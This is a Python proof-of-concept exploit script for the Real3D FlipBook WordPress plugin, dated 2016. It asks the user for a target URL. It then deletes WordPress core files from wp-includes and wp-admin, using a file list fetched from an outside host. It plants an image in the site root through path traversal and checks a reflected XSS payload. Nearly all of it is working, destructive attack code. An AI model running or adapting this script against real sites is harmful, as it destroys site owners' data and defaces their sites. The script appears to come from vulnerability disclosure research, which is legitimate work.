|
######################################################################### # [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin # [+] http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587 # [+] Multiple Vulnerabilities Found by: Mukarram Khalid # [+] https://mukarramkhalid.com/wordpress-real-3d-flipbook-plugin-exploit/ # [+] Requirements : Python 3.4.x or higher, Requests Module # [+] Timeline: Vuln Found : 01-07-2016, Reported to Vendor: 03-07-2016 ######################################################################## import os, json, base64 try: import requests except: exit('[-] Importing Requests module failed') class wpFlipbook: ''' Wordpress 3d flipbook plugin exploit ''' headers = {'User-agent' : 'Mozilla/11.0'} payload1 = {'deleteBook' : ''} payload2 = {'imgbase' : '', 'bookName' : '../../../', 'pageName' : 'makman'} payload3 = {'action' : 'delete', 'bookId' : '<script>alert(/makman/)</script>'} imageUrl = 'http://makman.tk/makman.jpg' wpFilesUrl = 'http://makman.tk/wpFiles.json' def __init__(self, url): url = url.rstrip('/') if 'http://' in url or 'https://' in url: self.url = url else: self.url = 'http://' + url def http(self, url, data = {}, post = False): try: if post: r = requests.post(url, data = data, headers = self.headers, timeout = 20) else: r = requests.get(url, params = data, headers = self.headers, timeout = 20) except: exit('[-] Something went wrong. Please check your internet connection') return r def deleteFiles(self): print('[+] Loading Wordpress file structure') r = self.http(self.wpFilesUrl) wpFiles = json.loads(r.text) print('[+] Wordpress File structure loaded successfully') print('[+] Creating directory real3dflipbook') r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True) print('[+] Deleting Files from wp-includes/ & wp-admin/') for wpFile in wpFiles['wpFiles']: print(' [+] Deleting File ' + wpFile) self.payload1['deleteBook'] = wpFile r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True) print('[+] Files have been deleted successfully') def uploadImage(self): print('[+] Loading image file') r = self.http('http://makman.tk/makman.jpg') encodedImage = base64.b64encode(r.content) self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8') print('[+] Uploading image file in target root directory') r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True) print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg') def xss(self): print('[+] Checking XSS payload') r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3) if self.payload3['bookId'] in r.text: print('[+] Found XSS here :') print(' [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId']) ######################################################################################################### def banner(): os.system('cls' if os.name == 'nt' else 'clear') tabs = ' ' print(tabs + '*******************************************************************') print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin *') print(tabs + '* [+] Multiple Vulnerabilities Found by: *') print(tabs + '* [+] https://mukarramkhalid.com *') print(tabs + '*******************************************************************\n\n') def main(): banner() url = input('[+] Enter Url\n[+] E.g. http://server or http://server/wordpress\n[+] ') exploit = wpFlipbook(url) exploit.deleteFiles() exploit.uploadImage() exploit.xss() print('[+] Done') if __name__ == '__main__': try: main() except KeyboardInterrupt: exit('\n[-] CTRL-C detected.\n') # End
|
|
|